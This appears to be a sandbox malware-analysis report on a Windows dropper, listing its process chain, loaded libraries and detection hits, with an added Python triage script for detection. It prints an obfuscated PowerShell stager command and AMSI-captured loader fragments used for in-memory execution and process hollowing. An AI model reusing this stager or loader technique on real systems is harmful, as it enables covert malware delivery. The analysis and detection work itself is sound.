            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\textless.exeFile created: C:\Users\user\AppData\Roaming\fyldepenneblkketsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
            Source: C:\Users\user\Desktop\textless.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsr1F1B.tmpJump to behavior
            Source: textless.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\textless.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\textless.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: textless.exeVirustotal: Detection: 30%
            Source: textless.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\textless.exe | File read: C:\Users\user\Desktop\textless.exe
            Source: unknown | Process created: C:\Users\user\Desktop\textless.exe "C:\Users\user\Desktop\textless.exe"
            Source: C:\Users\user\Desktop\textless.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
            Source: C:\Users\user\Desktop\textless.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\textless.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: umpdc.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\logman.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\logman.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\textless.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\textless.exe | File written: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\Resinlike\Dareful.ini
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: textless.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: logman.pdb source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Versificator.exe, Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: logman.pdbGCTL source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0ogHncCUa.exe, 0000000E.00000002.2117421157.000000000030F000.00000002.00000001.01000000.0000000F.sdmp
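The process-creation entries in the listing above are the part of this report a responder would build detection on. The PowerShell command line reads the whole dropped cacodemoniac.Pro file with gc -Raw, carves a three-character token out of it with SubString(54637,3) and invokes that token with the call operator, so the cmdlet name never appears on the command line; the chain then continues from powershell.exe to an executable in Temp, and from a process under Program Files (x86) to logman.exe started with nothing but its own image path (the report's own signatures call this process hollowing, and the PDB string at the end of the list names Joe Security's FakeChrome tool as the source of 0ogHncCUa.exe). The following is an added example, not Joe Sandbox code and not part of this report: a Python triage pass over those entries, transcribed inline. It extracts the script path and offset from the stager and applies three process-tree checks. The content of cacodemoniac.Pro is not on this page, so FAKE_SCRIPT is a constructed stand-in that assumes the carved token is iex; the rule names and the path heuristics are my own.

```python
import re

# Process-creation events transcribed from the report above as
# (parent image, child image, child command line).
EVENTS = [
    ("unknown",
     r"C:\Users\user\Desktop\textless.exe",
     r'"C:\Users\user\Desktop\textless.exe"'),
    (r"C:\Users\user\Desktop\textless.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw '
     r"'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';"
     r'$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Users\user\AppData\Local\Temp\Versificator.exe",
     r'"C:\Users\user~1\AppData\Local\Temp\Versificator.exe"'),
    (r"C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe",
     r"C:\Windows\SysWOW64\logman.exe",
     r'"C:\Windows\SysWOW64\logman.exe"'),
]

# Constructed stand-in for cacodemoniac.Pro. The real file is not on this page;
# as a placeholder we assume the 3 characters at offset 54637 spell "iex".
FAKE_SCRIPT = "#" * 54637 + "iex" + "\n# ...remaining obfuscated loader body...\n"

# gc -Raw '<file>' ... .SubString(<off>,<len>) ... .$var(   (the stager shape above)
STAGER_RE = re.compile(
    r"gc\s+-Raw\s+'(?P<path>[^']+)'"                 # whole script read into a variable
    r".*?\.SubString\((?P<off>\d+),(?P<len>\d+)\)"   # cmdlet name carved out of it
    r".*?\.\$\w+\(",                                  # invoked through the call operator
    re.IGNORECASE | re.DOTALL)


def parse_stager(cmdline):
    """Return script path, offset and length of the carved token, or None."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return {"script": m.group("path"),
            "offset": int(m.group("off")),
            "length": int(m.group("len"))}


def resolve_call(script_text, offset, length):
    """What the stager will execute: script_text.SubString(offset, length)."""
    return script_text[offset:offset + length]


USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def is_user_writable(path):
    return any(t in path.lower() for t in USER_WRITABLE)


def is_system_binary(path):
    return path.lower().startswith(SYSTEM_DIRS)


def triage(events):
    """Return (rule, parent, detail) findings over process-creation events."""
    findings = []
    for parent, child, cmdline in events:
        c = child.lower()
        if c.endswith("\\powershell.exe"):
            stager = parse_stager(cmdline)
            if stager:
                findings.append(("powershell-file-stager", parent, stager["script"]))
            if "-windowstyle" in cmdline.lower() and is_user_writable(parent):
                findings.append(("hidden-powershell-from-user-dir", parent, child))
        elif is_system_binary(child) and parent != "unknown" and not is_system_binary(parent):
            # Windows utility started by a parent outside the system directories
            # with a bare image path and no arguments: an injection target, not
            # a real invocation of the tool.
            if cmdline.strip().strip('"').lower() == c:
                findings.append(("lolbin-hollowing-candidate", parent, child))
        elif c.endswith(".exe") and is_user_writable(child) and "powershell.exe" in parent.lower():
            findings.append(("powershell-dropped-exe", parent, child))
    return findings


if __name__ == "__main__":
    for rule, parent, detail in triage(EVENTS):
        print(f"{rule:34} {parent} -> {detail}")
    s = parse_stager(EVENTS[1][2])
    print("stager executes:", resolve_call(FAKE_SCRIPT, s["offset"], s["length"]))
```

The regular expression is deliberately tied to the shape seen here (gc alias, -Raw, SubString, call operator); in a production rule widen it to Get-Content, cat and type, and treat any SubString or Substring-plus-call-operator pair as the indicator, since the offset and the variable names change per build. The hollowing check fires only on a bare image path, so a real logman.exe invocation with a verb and arguments does not match.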

            Data Obfuscation

            Source: Yara match | File source: 00000001.00000002.1507106973.0000000009D53000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Efforts $Tufstenenslluviate $Daahjortenes), (Turricular @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rerunning = [AppDomain]::CurrentDomain.GetAssemblie
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dobbeltfejls)), $Komponenternes).DefineDynamicModule($Inquaintance, $false).DefineType($Nondecadent, $Velsesskibenes, [System.Multicas
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0743F90E push 1C081915h; ret 1_2_0743F915
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212309AD push ecx; mov dword ptr [esp], ecx 11_2_212309B6
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CA5A7 push eax; ret 14_2_048CA5A8
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CF5E2 push ebx; ret 14_2_048CF5EA
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CA536 push ebx; ret 14_2_048CA53A
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CEEDD push edx; retf 14_2_048CEEDF
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048D1F39 push ecx; iretd 14_2_048D1F3A
